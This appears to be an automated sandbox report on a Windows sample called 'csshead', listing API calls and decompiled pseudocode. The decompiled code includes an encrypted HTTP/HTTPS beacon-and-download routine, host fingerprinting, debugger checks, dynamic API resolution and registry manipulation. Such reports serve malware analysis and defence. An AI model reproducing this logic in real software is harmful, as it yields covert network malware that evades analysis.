    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • IsDebuggerPresent.KERNEL32(?,00000001,00000000), ref: 004250D5
    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00000001,00000000), ref: 004250DF
    • UnhandledExceptionFilter.KERNEL32(?,?,00000001,00000000), ref: 004250EC
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(0043A498), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 98%
    			E00405D20(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20, intOrPtr _a24, char _a28, intOrPtr* _a32, intOrPtr* _a36) {
    				signed int _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				char _v24;
    				signed int _v28;
    				signed int _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				signed int _v44;
    				char _v48;
    				char _v52;
    				char _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				intOrPtr _v72;
    				signed int _v76;
    				char _v168;
    				char _v184;
    				char _v200;
    				char _v204;
    				char _v269;
    				char _v285;
    				char _v301;
    				char _v317;
    				intOrPtr _v324;
    				intOrPtr _v328;
    				intOrPtr _v332;
    				char _v336;
    				char _v849;
    				intOrPtr _t239;
    				signed int _t250;
    				char _t255;
    				intOrPtr _t256;
    				intOrPtr _t257;
    				intOrPtr _t259;
    				signed int _t330;
    				intOrPtr _t436;
    				intOrPtr _t438;
    				void* _t470;
    
    				_v8 = 0;
    				if(_a16 == 0) {
    					L40:
    					return _v8;
    				}
    				_v64 = 0;
    				if(_a20 == 0) {
    					__eflags = 0;
    					_v28 = 0;
    					L9:
    					_v60 = E00401110(_a16, E0040633C);
    					_t474 = _v60;
    					if(_v60 == 0) {
    						goto L40;
    					}
    					_v32 = _v60 - _a16;
    					E004012B8( &_v269, _v32, _a16);
    					 *((char*)(_t470 + _v32 - 0x109)) = 0;
    					E00401308( &_v849, _v60);
    					E004054B8( &_v849, _v60, _t474);
    					E00405858( &_v301, 0x10);
    					E00405858( &_v317, 0x10);
    					E004012B8( &_v184, 0x10,  &_v301);
    					E004012B8( &_v200, 0x10,  &_v317);
    					_v204 = _a28;
    					if(_a12 != 0) {
    						E004012B8( &_v168, 0x51, _a12);
    					}
    					E004017E8( &_v48, 0, 0, 0xf0000000, 1);
    					E004018A0(_v48, 0x94, _a8,  &_v56, 0, 0);
    					_v32 = 0x75;
    					E00401AB0(_v56, 0xffffffffffffffff, 0, 0x80,  &_v32,  &_v204, 0);
    					E00401AF8(_v56);
    					E00401B20(_v48, 0);
    					E00401268( &_v204, 0x80);
    					_t239 =  *0x40a1c0; // 0x401f00
    					_v12 = E00403864(_t239, _v28, _v64, 0, 0);
    					_v28 = 1;
    					E0040170C(_v12,  &_v28, 0x46, 4);
    					_v28 = 0x1770;
    					E0040170C(_v12,  &_v28, 2, 4);
    					_v28 = 0x1f40;
    					E0040170C(_v12,  &_v28, 6, 4);
    					E0040170C(_v12,  &_v28, 5, 4);
    					_v28 = 1;
    					_t250 = E0040170C(_v12,  &_v28, 0x4d, 4);
    					asm("sbb eax, eax");
    					if( ~( ~_t250) == 0) {
    						_v76 = 1;
    						_v72 = 0;
    						E0040170C(0,  &_v76, 0x32, 8);
    					}
    					if(_a4 == 0) {
    						_v28 = 0x50;
    					} else {
    						_v28 = 0x1bb;
    					}
    					_v16 = E0040161C(_v12, _v28,  &_v269, 0, 0, 3, 0, 0);
    					if(_a4 == 0) {
    						_v28 = 0x4600000;
    					} else {
    						_v28 = 0x4e03000;
    					}
    					_t255 =  *0x40a1c4; // 0x401f48
    					_v336 = _t255;
    					_t256 =  *0x40a1c8; // 0x401f54
    					_v332 = _t256;
    					_t257 =  *0x40a1cc; // 0x401f6c
    					_v328 = _t257;
    					_v324 = 0;
    					_t259 =  *0x40a23c; // 0x40209c
    					_t436 =  *0x40a1ac; // 0x401ed4
    					_v20 = E00401660(_v16,  &_v849, _t436, 0, _v28,  &_v336, 0, _t259);
    					if(_a4 != 0) {
    						_v32 = 4;
    						E004016D8(_v20,  &_v28, 0x1f,  &_v32);
    						_v28 = _v28 | 0x00000100;
    						E0040170C(_v20,  &_v28, 0x1f, 4);
    					}
    					_t482 = _a24;
    					if(_a24 == 0) {
    						_v68 = E004013DC(_v32 + 0x80);
    						_t397 = 0x80;
    						E004012B8(_v68, 0x80,  &_v204);
    						__eflags = 0;
    						_v32 = 0;
    					} else {
    						E00405894(_a24,  &_v301, _a28, _t482,  &_v32, 0);
    						_v68 = E004013DC(_v32 + 0x80);
    						E004012B8(_v68, 0x80,  &_v204);
    						_t397 =  &_v301;
    						E00405894(_a24,  &_v301, _a28, _t482,  &_v32, _v68 + 0x80);
    					}
    					_t438 =  *0x40a1d0; // 0x401f70
    					if(E004015E4(_v20, _t397 | 0xffffffff, _t438, _v32 + 0x80, _v68) != 0) {
    						E00401440(_v68);
    						_v32 = 4;
    						_v24 = 0;
    						_v28 = 0;
    						E004039CC(_v20,  &_v24, 0x20000013,  &_v28,  &_v32);
    						__eflags = _v24 - 0x12e;
    						if(_v24 != 0x12e) {
    							goto L39;
    						}
    						_v40 = E004013DC(0x1000);
    						__eflags = 0;
    						_v36 = 0;
    						while(1) {
    							_v44 = E004016A4(_v20, 0,  &_v32, 0);
    							asm("sbb eax, eax");
    							__eflags =  ~( ~_v44);
    							if( ~( ~_v44) == 0) {
    								goto L39;
    							}
    							__eflags = _v44;
    							if(_v44 == 0) {
    								continue;
    							}
    							__eflags = _v32;
    							if(_v32 == 0) {
    								__eflags = _v36 - 0x20;
    								if(_v36 >= 0x20) {
    									 *_a32 = E004013DC(_v36 + 1);
    									 *_a36 = _v36;
    									E004059BC(_v40 + 0x10,  &_v317, _v36 - 0x10, _a36,  *_a32);
    									E004017E8( &_v48, 0, 0, 0xf0000000, 1);
    									E00401374(_v48, 0, 0x8003,  &_v52, 0);
    									E00401404(_v52, 0x10,  &_v301, 0);
    									E00401404(_v52, 0x10,  &_v317, 0);
    									E00401404(_v52, E004012DC( &_v269),  &_v269, 0);
    									E00401404(_v52,  *_a36,  *_a32, 0);
    									_v32 = 0x10;
    									E00401490(_v52,  &_v285, 2, 0,  &_v32);
    									E004014D0(_v52);
    									E00401B20(_v48, 0);
    									_t330 = E004011F8( &_v285, 0x10, _v40);
    									__eflags = _t330;
    									if(_t330 != 0) {
    										E00401440(_v40);
    										 *((char*)( *_a32 +  *_a36)) = 0;
    										_v8 = 0xffffffff;
    									} else {
    										E00401440(_v40);
    										E00401440( *_a32);
    										 *_a32 = 0;
    										 *_a36 = 0;
    									}
    								} else {
    									E00401440(_v40);
    								}
    								goto L39;
    							}
    							__eflags = _v36 + _v32 - 0x200000;
    							if(_v36 + _v32 > 0x200000) {
    								goto L39;
    							}
    							_v40 = E00401460(_v40, _v36 + _v32);
    							E004015B0(_v20, _v32, _v40 + _v36,  &_v32);
    							_v36 = _v36 + _v32;
    						}
    						goto L39;
    					} else {
    						E00401440(_v68);
    						L39:
    						E0040151C(_v20);
    						E0040151C(_v16);
    						E0040151C(_v12);
    						goto L40;
    					}
    				}
    				if( *_a20 != 1) {
    					__eflags =  *_a20 - 2;
    					if( *_a20 != 2) {
    						__eflags =  *_a20 - 3;
    						if( *_a20 != 3) {
    							goto L40;
    						}
    						_v28 = 3;
    						_v64 = _a20 + 4;
    						goto L9;
    					}
    					_v28 = 0;
    				} else {
    					_v28 = 1;
    				}
    			}

    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 58%
    			E00408A48(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
    				intOrPtr _v8;
    				void* _t12;
    				void* _t24;
    
    				_t12 = _a8 - 2;
    				if(_t12 == 0) {
    					PostQuitMessage(0);
    					_v8 = 0;
    				} else {
    					if(_t12 == 0xf) {
    						E004078FC(_a16 & 0x80000000, _t24);
    						_v8 = 1;
    					} else {
    						_v8 =  *0x40b300(_a4, _a8, _a12, _a16);
    					}
    				}
    				return _v8;
    			}

    APIs
    • PostQuitMessage.USER32(00000000), ref: 00408A5F
      • Part of subcall function 004078FC: SHDeleteKeyA.SHLWAPI(80000002,004021A4), ref: 0040795A
      • Part of subcall function 004078FC: SHDeleteKeyA.SHLWAPI(80000001,004021A4), ref: 0040796D
    • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00408A92
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 100%
    			E00401928(CHAR* __eax) {
    				CHAR* _v8;
    				_Unknown_base(*)()* _v12;
    				CHAR* _v16;
    				intOrPtr _v20;
    				char _v149;
    				void* _t37;
    
    				_v8 = __eax;
    				_v16 = _v8;
    				while( *_v16 != 0x2e) {
    					_v16 =  &(_v16[1]);
    				}
    				_v20 = _v16 - _v8;
    				E004012B8( &_v149, _v20, _v8);
    				 *((char*)(_t37 + _v20 - 0x91)) = 0;
    				_v16 =  &(_v16[1]);
    				_v12 = GetProcAddress(LoadLibraryA( &_v149), _v16);
    				return _v12;
    			}

    APIs
    • LoadLibraryA.KERNEL32(00000000,00000000), ref: 0040197A
    • GetProcAddress.KERNEL32(00000000), ref: 00401981
    Memory Dump Source
    • Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 84%
    			E00403988(CHAR* __eax) {
    				CHAR* _v8;
    				signed char _v12;
    				void* _v16;
    				struct _WIN32_FIND_DATAA _v336;
    				signed int _t16;
    
    				_v8 = __eax;
    				_v12 = 0;
    				_t16 = FindFirstFileA(_v8,  &_v336);
    				_v16 = _t16;
    				asm("sbb eax, eax");
    				_v12 =  ~(_t16 & 0xffffff00 | _v16 != 0xffffffff);
    				FindClose(_v16);
    				return _v12;
    			}

    APIs
    • FindFirstFileA.KERNEL32(?,?), ref: 004039A4
    • FindClose.KERNEL32(000000FF), ref: 004039BF
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 100%
    			E00401460(void* __eax, long __edx) {
    				void* _v8;
    				long _v12;
    				void* _v16;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				_v16 = RtlReAllocateHeap(GetProcessHeap(), 0, _v8, _v12);
    				return _v16;
    			}

    APIs
    • GetProcessHeap.KERNEL32(00000000,?,?), ref: 00401476
    • RtlReAllocateHeap.NTDLL(00000000), ref: 0040147D
    Memory Dump Source
    • Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • ___mtold12.LIBCMT ref: 00431063
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(0043A498), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 100%
    			E004064BC(char* __eax, char __edx, void* __eflags) {
    				char* _v8;
    				char _v9;
    				struct _OSVERSIONINFOA _v168;
    				char _v233;
    				intOrPtr _t68;
    
    				_v9 = __edx;
    				_v8 = __eax;
    				E00401258(_v8, 0x51);
    				 *_v8 = _v9;
    				E004012B8(_v8 + 0x10, 0x12, 0x40b719);
    				E004012B8(_v8 + 1, E004012DC(0x40b794), 0x40b794);
    				E00401258( &_v168, 0x9c);
    				_v168.dwOSVersionInfoSize = 0x9c;
    				GetVersionExA( &_v168);
    				E00401864(_v168.dwMajorVersion,  &_v233);
    				 *((char*)(_v8 + 0x22)) = _v233;
    				 *((char*)(_v8 + 0x23)) = 0x2e;
    				E00401864(_v168.dwMinorVersion,  &_v233);
    				 *((char*)(_v8 + 0x24)) = _v233;
    				_t68 =  *0x40a068; // 0x3
    				E00401864(_t68,  &_v233);
    				 *((char*)(_v8 + 0x26)) = _v233;
    				if( *0x40a058 == 0) {
    					 *((char*)(_v8 + 0x27)) = 0x30;
    				} else {
    					 *((char*)(_v8 + 0x27)) = 0x31;
    				}
    				if( *0x40a034 == 0) {
    					 *((char*)(_v8 + 0x28)) = 0x30;
    				} else {
    					 *((char*)(_v8 + 0x28)) = 0x31;
    				}
    				if(E00403EA0() == 0) {
    					 *((char*)(_v8 + 0x25)) = 0x30;
    				} else {
    					 *((char*)(_v8 + 0x25)) = 0x31;
    				}
    				 *((intOrPtr*)(_v8 + 0x29)) = E00405468();
    				return E00401308(_v8 + 0x2d, 0x40b00c);
    			}

    APIs
    • GetVersionExA.KERNEL32(0000009C), ref: 00406530
      • Part of subcall function 00401864: wsprintfA.USER32 ref: 00401874
      • Part of subcall function 00403EA0: RegCreateKeyExA.ADVAPI32(80000002,004021A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00403ECD
      • Part of subcall function 00403EA0: RegCreateKeyExA.ADVAPI32(80000001,004021A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00403EF3
      • Part of subcall function 00405468: GetSystemTime.KERNEL32(?), ref: 00405472
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • CryptEncrypt.ADVAPI32(?,?,?,?,?,?,?), ref: 00401AE5
    Memory Dump Source
    • Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 100%
    			E004017A2(long* __eax, int __ecx, long* __edx, DWORD* _a4, BYTE* _a8, int _a12) {
    				long* _v8;
    				long* _v12;
    				int _v16;
    				int _v20;
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				if( *((char*)( *0x40b460)) != 0xe9) {
    					_v20 = CryptDecrypt(_v8, _v12, _v16, _a12, _a8, _a4);
    				}
    				return _v20;
    			}

    APIs
    • CryptDecrypt.ADVAPI32(?,?,?,?,?,?), ref: 004017D5
    Memory Dump Source
    • Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 100%
    			E004017A4(long* __eax, int __ecx, long* __edx, DWORD* _a4, BYTE* _a8, int _a12) {
    				long* _v8;
    				long* _v12;
    				int _v16;
    				int _v20;
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				if( *((char*)( *0x40b460)) != 0xe9) {
    					_v20 = CryptDecrypt(_v8, _v12, _v16, _a12, _a8, _a4);
    				}
    				return _v20;
    			}

    APIs
    • CryptDecrypt.ADVAPI32(?,?,?,?,?,?), ref: 004017D5
    Memory Dump Source
    • Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 100%
    			E004018A0(long* __eax, int __ecx, BYTE* __edx, HCRYPTKEY* _a4, int _a8, long* _a12) {
    				long* _v8;
    				BYTE* _v12;
    				int _v16;
    				int _v20;
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				if( *((char*)( *0x40b500)) != 0xe9) {
    					_v20 = CryptImportKey(_v8, _v12, _v16, _a12, _a8, _a4);
    				}
    				return _v20;
    			}

    APIs
    • CryptImportKey.ADVAPI32(?,?,?,?,?,?), ref: 004018D1
    Memory Dump Source
    • Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 58%
    			E00408A44(intOrPtr* __eax, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
    				intOrPtr _v8;
    				intOrPtr _v117;
    				void* _t15;
    				void* _t27;
    
    				 *__eax =  *__eax + __eax;
    				_v117 = _v117 + __edx;
    				_t15 = _a12 - 2;
    				if(_t15 == 0) {
    					PostQuitMessage(0);
    					_v8 = 0;
    				} else {
    					if(_t15 == 0xf) {
    						E004078FC(_a16 & 0x80000000, _t27);
    						_v8 = 1;
    					} else {
    						_v8 =  *0x40b300(_a4, _a8, _a12, _a16);
    					}
    				}
    				return _v8;
    			}

    APIs
      • Part of subcall function 004078FC: SHDeleteKeyA.SHLWAPI(80000002,004021A4), ref: 0040795A
      • Part of subcall function 004078FC: SHDeleteKeyA.SHLWAPI(80000001,004021A4), ref: 0040796D
    • PostQuitMessage.USER32(00000000), ref: 00408A5F
    • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00408A92
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 100%
    			E004017E8(HCRYPTPROV* __eax, char* __ecx, char* __edx, int _a4, int _a8) {
    				HCRYPTPROV* _v8;
    				char* _v12;
    				char* _v16;
    				int _v20;
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				if( *((char*)( *0x40b4fc)) != 0xe9) {
    					_v20 = CryptAcquireContextA(_v8, _v12, _v16, _a8, _a4);
    				}
    				return _v20;
    			}

    APIs
    • CryptAcquireContextA.ADVAPI32(?,?,?,?,?), ref: 00401815
    Memory Dump Source
    • Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • CryptCreateHash.ADVAPI32(?,?,?,?,?), ref: 004013A1
    Memory Dump Source
    • Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • CryptGetHashParam.ADVAPI32(?,?,?,?,?), ref: 004014BD
    Memory Dump Source
    • Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • CryptHashData.ADVAPI32(?,?,?,?), ref: 0040142D
    Memory Dump Source
    • Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • CryptSetKeyParam.ADVAPI32(?,?,?,?), ref: 0040159D
    Memory Dump Source
    • Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • CryptHashData.ADVAPI32(?,?,?,?), ref: 0040142D
    Memory Dump Source
    • Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 100%
    			E0040153C(long* __eax, BYTE* __ecx, int __edx) {
    				long* _v8;
    				int _v12;
    				BYTE* _v16;
    				int _v20;
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				if( *((char*)( *0x40b458)) != 0xe9) {
    					_v20 = CryptGenRandom(_v8, _v12, _v16);
    				}
    				return _v20;
    			}

    APIs
    • CryptGenRandom.ADVAPI32(?,?,?), ref: 00401561
    Memory Dump Source
    • Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 100%
    			E00401B20(long* __eax, int __edx) {
    				long* _v8;
    				int _v12;
    				int _v16;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				if( *((char*)( *0x40b50c)) != 0xe9) {
    					_v16 = CryptReleaseContext(_v8, _v12);
    				}
    				return _v16;
    			}

    APIs
    • CryptReleaseContext.ADVAPI32(?,?), ref: 00401B3E
    Memory Dump Source
    • Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • CryptDestroyHash.ADVAPI32(?), ref: 004014E7
    Memory Dump Source
    • Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 100%
    			E00401AF8(long* __eax) {
    				long* _v8;
    				int _v12;
    
    				_v8 = __eax;
    				if( *((char*)( *0x40b508)) != 0xe9) {
    					_v12 = CryptDestroyKey(_v8);
    				}
    				return _v12;
    			}

    APIs
    • CryptDestroyKey.ADVAPI32(?), ref: 00401B0F
    Memory Dump Source
    • Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 100%
    			E00405468() {
    				intOrPtr _v8;
    				struct _SYSTEMTIME _v24;
    
    				GetSystemTime( &_v24);
    				_v8 = E004053D4( &_v24);
    				return _v8;
    			}

    APIs
    • GetSystemTime.KERNEL32(?), ref: 00405472
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 100%
    			E00406D40() {
    				int _v8;
    
    				_v8 = IsDebuggerPresent();
    				return _v8;
    			}

    APIs
    • IsDebuggerPresent.KERNEL32 ref: 00406D44
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
